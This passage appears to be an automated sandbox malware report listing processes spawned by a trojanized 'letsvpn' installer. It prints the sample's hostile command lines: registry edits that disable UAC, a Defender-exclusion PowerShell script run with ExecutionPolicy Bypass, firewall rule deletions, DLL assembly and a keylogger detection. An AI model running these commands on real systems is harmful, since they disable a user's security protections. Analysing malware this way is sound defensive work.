                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:5
                                                                                                                                                                                                  Start time:10:14:20
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\netsh.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:"C:\Windows\System32\netsh.exe" exec C:\ProgramData\s1qGS.xml
                                                                                                                                                                                                  Imagebase:0x7ff6adfd0000
                                                                                                                                                                                                  File size:96'768 bytes
                                                                                                                                                                                                  MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:6
                                                                                                                                                                                                  Start time:10:14:20
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:7
                                                                                                                                                                                                  Start time:10:14:20
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Roaming\06VAP.bat"
                                                                                                                                                                                                  Imagebase:0x7ff61fb20000
                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:8
                                                                                                                                                                                                  Start time:10:14:20
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:9
                                                                                                                                                                                                  Start time:10:14:20
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t reg_dword /d 0 /F
                                                                                                                                                                                                  Imagebase:0x7ff78bf10000
                                                                                                                                                                                                  File size:77'312 bytes
                                                                                                                                                                                                  MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:10
                                                                                                                                                                                                  Start time:10:14:20
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t reg_dword /d 0 /F
                                                                                                                                                                                                  Imagebase:0x7ff78bf10000
                                                                                                                                                                                                  File size:77'312 bytes
                                                                                                                                                                                                  MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:11
                                                                                                                                                                                                  Start time:10:14:21
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v PromptOnSecureDesktop /t reg_dword /d 0 /F
                                                                                                                                                                                                  Imagebase:0x7ff78bf10000
                                                                                                                                                                                                  File size:77'312 bytes
                                                                                                                                                                                                  MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:13
                                                                                                                                                                                                  Start time:10:14:21
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                  Imagebase:0x7ff7403e0000
                                                                                                                                                                                                  File size:55'320 bytes
                                                                                                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                  Target ID:16
                                                                                                                                                                                                  Start time:10:14:23
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c copy /b C:\ProgramData\Jm42a\Q4nO1~16\s+C:\ProgramData\Jm42a\Q4nO1~16\a C:\ProgramData\Jm42a\Q4nO1~16\base.dll
                                                                                                                                                                                                  Imagebase:0x7ff61fb20000
                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:17
                                                                                                                                                                                                  Start time:10:14:23
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:18
                                                                                                                                                                                                  Start time:10:14:25
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\mmc.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\mmc.exe -Embedding
                                                                                                                                                                                                  Imagebase:0x7ff7cf500000
                                                                                                                                                                                                  File size:1'953'280 bytes
                                                                                                                                                                                                  MD5 hash:58C9E5172C3708A6971CA0CBC80FE8B8
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                  Target ID:19
                                                                                                                                                                                                  Start time:10:14:25
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:"C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe"
                                                                                                                                                                                                  Imagebase:0x510000
                                                                                                                                                                                                  File size:258'328 bytes
                                                                                                                                                                                                  MD5 hash:68411B35F7B40B45AFC4A60A2681549D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                  Target ID:20
                                                                                                                                                                                                  Start time:10:14:26
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\mmc.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\mmc.exe -Embedding
                                                                                                                                                                                                  Imagebase:0x7ff7cf500000
                                                                                                                                                                                                  File size:1'953'280 bytes
                                                                                                                                                                                                  MD5 hash:58C9E5172C3708A6971CA0CBC80FE8B8
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                  Target ID:21
                                                                                                                                                                                                  Start time:10:14:27
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:"C:\ProgramData\letsvpn-latest.exe"
                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                  File size:15'511'576 bytes
                                                                                                                                                                                                  MD5 hash:9F5F358AA1A85D222AD967F4538BC753
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000015.00000003.2520982126.00000000031F6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:22
                                                                                                                                                                                                  Start time:10:14:27
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c ipconfig /all
                                                                                                                                                                                                  Imagebase:0x1c0000
                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:23
                                                                                                                                                                                                  Start time:10:14:27
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:24
                                                                                                                                                                                                  Start time:10:14:27
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\ipconfig.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:ipconfig /all
                                                                                                                                                                                                  Imagebase:0xd40000
                                                                                                                                                                                                  File size:29'184 bytes
                                                                                                                                                                                                  MD5 hash:3A3B9A5E00EF6A3F83BF300E2B6B67BB
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:27
                                                                                                                                                                                                  Start time:10:15:01
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:powershell -inputformat none -ExecutionPolicy Bypass -File "C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1"
                                                                                                                                                                                                  Imagebase:0xf60000
                                                                                                                                                                                                  File size:433'152 bytes
                                                                                                                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:28
                                                                                                                                                                                                  Start time:10:15:01
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:33
                                                                                                                                                                                                  Start time:10:15:05
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Program Files (x86)\letsvpn\driver\tapinstall.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901
                                                                                                                                                                                                  Imagebase:0x7ff796190000
                                                                                                                                                                                                  File size:101'536 bytes
                                                                                                                                                                                                  MD5 hash:1E3CF83B17891AEE98C3E30012F0B034
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:34
                                                                                                                                                                                                  Start time:10:15:05
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:35
                                                                                                                                                                                                  Start time:10:15:05
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Program Files (x86)\letsvpn\driver\tapinstall.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" install "C:\Program Files (x86)\letsvpn\driver\OemVista.inf" tap0901
                                                                                                                                                                                                  Imagebase:0x7ff796190000
                                                                                                                                                                                                  File size:101'536 bytes
                                                                                                                                                                                                  MD5 hash:1E3CF83B17891AEE98C3E30012F0B034
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:36
                                                                                                                                                                                                  Start time:10:15:05
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:37
                                                                                                                                                                                                  Start time:10:15:07
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall
                                                                                                                                                                                                  Imagebase:0x7ff7403e0000
                                                                                                                                                                                                  File size:55'320 bytes
                                                                                                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                  Target ID:38
                                                                                                                                                                                                  Start time:10:15:07
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\drvinst.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:DrvInst.exe "4" "0" "C:\Users\user\AppData\Local\Temp\{7c77b43b-9dea-844d-b268-70c5b13694a4}\oemvista.inf" "9" "4d14a44ff" "0000000000000160" "WinSta0\Default" "0000000000000148" "208" "c:\program files (x86)\letsvpn\driver"
                                                                                                                                                                                                  Imagebase:0x7ff63a620000
                                                                                                                                                                                                  File size:337'920 bytes
                                                                                                                                                                                                  MD5 hash:294990C88B9D1FE0A54A1FA8BF4324D9
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:39
                                                                                                                                                                                                  Start time:10:15:09
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\drvinst.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem4.inf" "oem4.inf:3beb73aff103cc24:tap0901.ndi:9.24.6.601:tap0901," "4d14a44ff" "0000000000000160"
                                                                                                                                                                                                  Imagebase:0x7ff63a620000
                                                                                                                                                                                                  File size:337'920 bytes
                                                                                                                                                                                                  MD5 hash:294990C88B9D1FE0A54A1FA8BF4324D9
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:40
                                                                                                                                                                                                  Start time:10:15:09
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc
                                                                                                                                                                                                  Imagebase:0x7ff7403e0000
                                                                                                                                                                                                  File size:55'320 bytes
                                                                                                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:41
                                                                                                                                                                                                  Start time:10:15:10
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Program Files (x86)\letsvpn\driver\tapinstall.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901
                                                                                                                                                                                                  Imagebase:0x7ff796190000
                                                                                                                                                                                                  File size:101'536 bytes
                                                                                                                                                                                                  MD5 hash:1E3CF83B17891AEE98C3E30012F0B034
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:42
                                                                                                                                                                                                  Start time:10:15:11
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:43
                                                                                                                                                                                                  Start time:10:15:11
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:cmd /c netsh advfirewall firewall Delete rule name=lets
                                                                                                                                                                                                  Imagebase:0x1c0000
                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:44
                                                                                                                                                                                                  Start time:10:15:11
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:45
                                                                                                                                                                                                  Start time:10:15:11
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:netsh advfirewall firewall Delete rule name=lets
                                                                                                                                                                                                  Imagebase:0xa60000
                                                                                                                                                                                                  File size:82'432 bytes
                                                                                                                                                                                                  MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:46
                                                                                                                                                                                                  Start time:10:15:12
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:cmd /c netsh advfirewall firewall Delete rule name=lets.exe
                                                                                                                                                                                                  Imagebase:0x1c0000
                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:47
                                                                                                                                                                                                  Start time:10:15:12
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:48
                                                                                                                                                                                                  Start time:10:15:12
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:netsh advfirewall firewall Delete rule name=lets.exe
                                                                                                                                                                                                  Imagebase:0xa60000
                                                                                                                                                                                                  File size:82'432 bytes
                                                                                                                                                                                                  MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

Target ID:49
Start time:10:15:12
Start date:29/12/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:cmd /c netsh advfirewall firewall Delete rule name=LetsPRO.exe
Imagebase:0x1c0000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:50
Start time:10:15:12
Start date:29/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff66e660000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:51
Start time:10:15:12
Start date:29/12/2024
Path:C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):true
Commandline:netsh advfirewall firewall Delete rule name=LetsPRO.exe
Imagebase:0xa60000
File size:82'432 bytes
MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:52
Start time:10:15:12
Start date:29/12/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:cmd /c netsh advfirewall firewall Delete rule name=LetsPRO
Imagebase:0x1c0000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:53
Start time:10:15:12
Start date:29/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6ae840000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:54
Start time:10:15:13
Start date:29/12/2024
Path:C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):true
Commandline:netsh advfirewall firewall Delete rule name=LetsPRO
Imagebase:0xa60000
File size:82'432 bytes
MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:55
Start time:10:15:13
